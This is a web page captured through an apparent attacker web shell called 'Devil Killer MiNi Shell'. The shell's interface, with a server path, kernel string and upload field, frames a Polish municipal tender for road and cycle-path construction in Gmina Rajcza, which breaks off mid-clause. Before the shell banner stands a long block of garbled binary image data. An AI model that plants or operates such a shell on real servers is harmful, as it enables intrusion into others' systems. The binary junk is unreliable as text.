JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20240709/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20240709/0040398301-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa i modernizacja infrastruktury drogowej w Gminie Rajcza </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA RAJCZA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 072182692</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Górska 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rajcza</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">34-370</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL225 - Bielski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ugrajcza@rajcza.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.rajcza.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa i modernizacja infrastruktury drogowej w Gminie Rajcza </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-490d4876-66ac-46f4-9bf2-d2942872026e</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00403983</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-490d4876-66ac-46f4-9bf2-d2942872026e <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.	W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl oraz – w szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego – za pośrednictwem Platformy e-Zamówienia, elektronicznej skrzynki podawczej (ESP) na ePUAP: Urząd Gminy Rajcza /d43pji4r0h/skrytka oraz poczty elektronicznej ugrajcza@rajcza.com.pl.<br/>Szczegóły opisano w rozdziale IX SWZ.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy<br/>do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako<br/>załączniki do jednego formularza). Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa „Regulamin Platformy e-Zamówienia”. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą skorzystać<br/>ze wsparcia technicznego dostępnego pod numerem telefonu (22) 458 77 99 lub drogą elektroniczną poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”. <br/>Szczegóły opisano w rozdziale IX SW</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.1.TPBN.7.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakres zamówienia:<br/>1)	SOŁECTWO RAJCZA:<br/>a)	przebudowa drogi wewnętrznej „Do Butorów” w Rajczy w km 0+000 do 0+134 oraz od 0+370 do 0+550 – w ramach zadania zostanie wykonana nawierzchnia składająca się z warstw:<br/>- warstwa wiążąca z betonu asfaltowego AC16W gr. 4 cm,<br/>- warstwa ścieralna z betonu asfaltowego AC8S gr. 4 cm,<br/>- dodatkowo należy wykonać pobocza obustronne z kruszywa frakcji 0-31,5 mm.<br/>Przebudowa odbywa się na długości 314m o szerokości jezdni 2,5m-2,8m po istniejącym śladzie drogi. Nie występuje kolizja z uzbrojeniem terenu.<br/>Szczegółowy opis przedmiotu zamówienia określono w projekcie budowlanym, przedmiarze oraz specyfikacji technicznej stanowiących ZAŁĄCZNIK nr 8 do SWZ,<br/><br/>b)	remont drogi od Dworca PKP do przejazdu kolejowego „Wiercigrochy” w Rajczy w km od 0+000 do 0+401 – w ramach zadania zostaną wykonane następujące prace:<br/>- remont nawierzchni jezdni drogi gminnej,<br/>- remont fragmentu chodnika dla pieszych,<br/>- wymiana krawężników,<br/>- remont odwodnienia przedmiotowego odcinka drogi gminnej.<br/>na długości 401 m.<br/>W ramach remontu nawierzchni jezdni drogi zostanie wykonana nawierzchnia bitumiczna o szerokości 5,7-7,0m (zgodna ze stanem istniejącym), w ramach remontu chodnika zostanie wykonana nawierzchnia z kostki betonowej wraz z krawężnikiem i obrzeżem o szerokości 1,50m (zgodnie ze stanem istniejącym).<br/>Szczegółowy opis przedmiotu zamówienia określono w projekcie budowlanym, projekcie technicznym, przedmiarze oraz specyfikacji technicznej stanowiących ZAŁĄCZNIK NR 8A do SWZ,<br/><br/>2)	SOŁECTWO RYCERKA DOLNA:<br/>a)	przebudowa drogi wewnętrznej „Do Głębokiego” w Rycerce Dolnej w km od 0+190 do 0+375 – Etap I oraz od 0+665 do 0+825 – Etap II – w ramach zadania zostanie wykonana nawierzchnia składająca się z warstw:<br/>- warstwa wyrównawcza poprzez remont cząstkowy: 30 Mg dla E. I oraz II,<br/>- warstwa wiążąca z betonu asfaltowego AC16W gr. 5cm, <br/>- warstwa ścieralna z betonu asfaltowego AC8S gr. 4 cm,<br/>- dodatkowo należy wykonać pobocza obustronne z kruszywa frakcji 0-31,5mm.<br/>Przebudowa odbywa się na długości 185 mb + 160 mb (345 mb) o szerokości jezdni 2,85 m po istniejącym śladzie drogi.<br/>Szczegółowy opis przedmiotu zamówienia określono w projekcie budowlanym, przedmiarze (ETAP I oraz ETAP II) oraz specyfikacji technicznej stanowiących ZAŁĄCZNIK NR 9 do SWZ,<br/><br/>b)	budowa ścieżki rowerowej w Rycerce Dolnej łączącej istniejący odcinek ścieżki „U Janotów” z odcinkiem od ośrodka Brzeszcze – Etap II w km od 0+000 do 0+555 oraz od 0+616 do 0+922 – zadanie obejmie: korytowanie wraz profilowaniem gruntu rodzimego do wymaganych rzędnych, ułożenie podbudowy z kruszywa naturalnego 0/63mm stabilizowanego mechanicznie o grubości 30,0 cm oraz podbudowy zasadniczej z kruszywa łamanego 0/31,5mm stabilizowanego mechanicznie o grubości 20,0 cm oraz wykonanie warstwy ścieralnej z betonu asfaltowego 0/11m o grubości 6,0 cm. Ścieżka z obu stron winna zostać ograniczona obrzeżem betonowym 8x30 cm układanym na ławie betonowej z obustronnym oporem, z betonu C16/20. Istniejący teren zielony wzdłuż budowanej ścieżki rowerowej należy wyrównać poprzez jego niwelację i profilowanie, usunięcie lekkich nierówności terenu, oczyszczenie z kamieni, czy drewna itp. Następnie należy wykonać rekultywację i humusowanie.<br/>Podstawowe parametry techniczne inwestycji:<br/>- szerokość jezdni ścieżki: 3,00 m,<br/>- nawierzchnia ścieżki: beton asfaltowy,<br/>- przekrój poprzeczny ścieżki: jednostronny o nachyleniu 2,0 %,<br/>- długość ścieżki: 861,00 m,<br/>- spadki podłużne niwelety: 0,21 – 6,0 %.<br/>Szczegółowy opis przedmiotu zamówienia określono w projekcie budowlanym, projekcie technicznym, przedmiarze oraz specyfikacji technicznej stanowiących ZAŁĄCZNIK nr 9A do SWZ,<br/><br/>3)	SOŁECTWA RYCERKA DOLNA I RYCERKA GÓRNA:<br/>a)	budowa ciągu pieszo-rowerowego oraz umocnionego i gruntowego pobocza w ramach zadania „Rozbudowa drogi powiatowej nr 1444S Rycerka Dolna – Rycerka Górna na terenie Gminy Rajcza w km od 2+654 do km 4+642,36” – w ramach zadania zostaną wykonane trzy odcinki tworzące łącznie logiczną całość:<br/>1)	odcinek I w km roboczym 0+000 – 0+656,37 o długości 656,37 m (w km lokalnym 2+654 do 3+307,37) ww. drogi powiatowej obejmuje swoim zakresem wykonanie m.in.:<br/>- 407,30 mb pobocza o nawierzchni twardej, bitumicznej oraz przylegającego do pobocza utwardzonego, pobocza o nawierzchni gruntowej (w km 0+000 do 0+407,30),<br/>- 249,07 mb drogi pieszo-rowerowej wzdłuż istniejącej jezdni za poboczem i pasem zieleni (w km od 0+407,30 do 0+656,37), przepust betonowy fi 800 mm (w km 0+648,48);<br/>2)	odcinek II w km roboczym 0+656,37 – 1+512 o długości 754,63 m (w km lokalnym od 3+310,37 do km 4+166) ww. drogi powiatowej obejmujący swoim zakresem wykonanie drogi pieszo-rowerowej o szerokości 4,0 m o nawierzchni asfaltowej oraz pobocza o nawierzchni twardej, bitumicznej i przylegającego do pobocza utwardzonego, pobocza o nawierzchni gruntowej;<br/>3)	odcinek III w km roboczym 1+512 – 1+985,36 o długości 473,36 m (w km lokalnym 4+166 do 4+639,36) ww. drogi powiatowej obejmuje swoim zakresem wykonanie m.in.:<br/>- w km roboczym od 1+834,39 do 1+985,36 pobocze o nawierzchni twardej, bitumicznej oraz przylegającego do pobocza utwardzonego, pobocza o nawierzchni gruntowej,<br/>- w km roboczym od 1+512 do km 1+847,2 drogę pieszo-rowerową szerokości 4,0 m o nawierzchni asfaltowej i długości 335,20 m.<br/>Szczegółowy opis przedmiotu zamówienia określono w projekcie budowlanym (dla każdego odcinka z osobna), przedmiarze oraz specyfikacji technicznej stanowiących ZAŁĄCZNIK NR 10 do SWZ,<br/><br/>4)	SOŁECTWO ZWARDOŃ:<br/>a)	przebudowa drogi gminnej w miejscowości Zwardoń Bór do Schroniska PTTK w Zwardoniu w km od 2+560 do 3+127 – w ramach zadania zostanie wykonana nawierzchnia z betonu asfaltowego 4 cm + 5 cm na długości 340m o szerokości 3,0m oraz pobocza gruntowe o szerokości 0,30m.<br/>Szczegółowy opis przedmiotu zamówienia określono w projekcie budowlanym, przedmiarze oraz specyfikacji technicznej stanowiących ZAŁĄCZNIK NR 11 do SWZ,<br/><br/>b)	przebudowa drogi wewnętrznej „Koło Szwajcarii” Etap II w Zwardoniu w km od 0+000 do 0+146 – w ramach zadania zostanie wykonana droga jednojezdniowa, jednopasmowa, dwukierunkowa o przekroju poprzecznym jednostronnym, o długości 146m i szerokości 2,8m – 3,3m, nawierzchnia bitumiczna, pobocza tłuczniowe, o szerokości 0,30m,<br/>Szczegółowy opis przedmiotu zamówienia określono w projekcie budowlanym, przedmiarze oraz specyfikacji technicznej stanowiących ZAŁĄCZNIK NR 11A do SWZ,<br/><br/>5)	SOŁECTWO SÓL:<br/>a)	przebudowa drogi „Pod Rachowiec” w Soli w km od 0+090 do 0+800 – w ramach zadania zostanie wykonana nawierzchnia składająca się z warstw:<br/>- geowłóknina separacyjna o gramaturze 200m2,<br/>- podbudowa z kruszywa łamanego 0-63mm gr. 30 cm,<br/>- warstwa wiążąca z betonu asfaltowego gr. 4 cm,<br/>- warstwa ścieralna z betonu asfaltowego gr. 4 cm,<br/>na długości 710m o szerokości 3,0 m.<br/>Szczegółowy opis przedmiotu zamówienia określono w projekcie technicznym, przedmiarze oraz specyfikacji technicznej stanowiących ZAŁĄCZNIK NR 12 do SWZ,<br/><br/>6)	SOŁECTWO SÓL-KICZORA:<br/>a)	przebudowa drogi wewnętrznej „Do Szpaków” pod kościołem w Soli-Kiczorze w km od 0+000 do 0+302 – w ramach zadania zostanie wykonana nawierzchnia składająca się z warstw:<br/>- warstwa wiążąca z betonu asfaltowego AC16W gr. 4 cm,<br/>- warstwa ścieralna z betonu asfaltowego AC8S gr. 4 cm,<br/>- dodatkowo należy wykonać pobocza obustronne z kruszywa frakcji 0-31,5mm.<br/>Przebudowa odbywa się na długości 302m o szerokości jezdni 2,7m po istniejącym śladzie drogi.<br/>Szczegółowy opis przedmiotu zamówienia określono w projekcie budowlanym, przedmiarze oraz specyfikacji technicznej stanowiących ZAŁĄCZNIK NR 13 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45220000-5 - Roboty inżynieryjne i budowlane</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą się ubiegać wykonawcy, którzy:<br/>1. nie podlegają wykluczeniu:<br/>1.1 w okolicznościach, o których mowa w art. 108 ust. 1 1 pkt 1) – 6) ustawy, z zastrzeżeniem wyjątków przewidzianych w ustawie – do potwierdzenia oświadczeniem do oferty – Załącznik Nr 2 do SWZ.<br/>1.2 w okolicznościach, o których mowa w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t.j. Dz. U. 2024 poz. 507) – do potwierdzenia oświadczeniem do oferty – Załącznik Nr 2C do SWZ.<br/>2. spełniają warunki udziału w postępowaniu dotyczące:<br/>2.1 zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie precyzuje w tym zakresie szczegółowych warunków.<br/>2.2 uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie precyzuje w tym zakresie szczegółowych warunków.<br/>2.3 sytuacji ekonomicznej lub finansowej:<br/>Wykonawca w okresie trwania umowy posiada ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.<br/>2.4	zdolności technicznej lub zawodowej:<br/>2.4.1 Zamawiający wymaga, aby Wykonawca należycie wykonał co najmniej jedną (1) robotę budowlaną, której zakres obejmował budowę, przebudowę, rozbudowę lub remont drogi lub placów publicznych, a wartość budowy, przebudowy, rozbudowy lub remontu drogi lub placów publicznych, wyniosła co najmniej 500.000,00 zł brutto (słownie: pięćset tysięcy złotych 00/100), nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie) – Załącznik Nr 5 do SWZ.<br/>Zamawiający wymaga, aby w/w robota budowlana lub usługa została wykonana należycie. <br/>2.4.2 Zamawiający wymaga, aby osoby, które Wykonawca skieruje do realizacji zamówienia w zakresie kierowania robotami budowlanymi, legitymowały się następującymi kwalifikacjami zawodowymi:<br/>a)	uprawnieniami budowlanymi, o których mowa w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz. U. z 2024 r. poz. 725 z późn. zm.) w specjalności inżynieryjnej drogowej bez ograniczeń, uprawniające do kierowania robotami budowlanymi związanymi z obiektem budowlanym stanowiącym przedmiot zamówienia* – wymagana 1 osoba – Załącznik Nr 6 do SWZ.<br/>Szczegóły opisano w rozdziale IV SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający przewiduje obowiązek wniesienia wadium przed upływem terminu składania ofert w wysokości: 50.000,00 zł (słownie: pięćdziesiąt tysięcy złotych 00/100).<br/>2. Wadium może być wniesione w jednej lub kilku następujących formach:<br/>1)	pieniądzu (w tytule przelewu należy podać nr sprawy: ZP.271.1.TPBN.7.2024),<br/>2)	gwarancjach bankowych,<br/>3)	gwarancjach ubezpieczeniowych,<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu polskiej Agencji Rozwoju Przedsiębiorczości (tj. Dz. U. z 2024 r. poz. 419).<br/>3.	Wadium wnoszone w pieniądzu należy wpłacać przelewem na rachunek bankowy Urzędu Gminy Rajcza, na konto: Bank Spółdzielczy w Rajczy nr 92 8125 0008 0000 0202 2000 0060. Kserokopię dowodu wpłaty wadium należy dołączyć do oferty.<br/>Szczegóły opisano w rozdziale VII SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że Zamawiający przewidział możliwość dokonania takiej zmiany w ogłoszeniu o zamówieniu lub SWZ oraz określił warunki takiej zmiany.<br/>2.	Zamawiający dopuszcza – jeżeli uzna za uzasadnione – możliwość zmiany ustaleń zawartej umowy w stosunku do treści oferty Wykonawcy, o których mowa w art. 455 ust. 1 pkt 1 i 2 p.z.p. w następujących przypadkach:<br/>a)	zmiany terminu realizacji umowy, w następstwie:<br/>a.	wystąpienia okoliczności wynikających z siły wyższej w rozumieniu kodeksu cywilnego;<br/>b.	zaistnienia szczególnie niekorzystnych i długotrwałych warunków atmosferycznych, uniemożliwiających wykonanie Przedmiotu umowy przez okres dłuższy niż 2 tygodnie zgodnie ze sztuką budowlaną i technologią robót, chyba, że zwłoka z tego powodu nie wystąpiłyby, gdyby roboty były realizowane przez Wykonawcę w terminach określonych Umową. Wstrzymanie robót z tego powodu musi być potwierdzone w dzienniku budowy i zaakceptowane przez 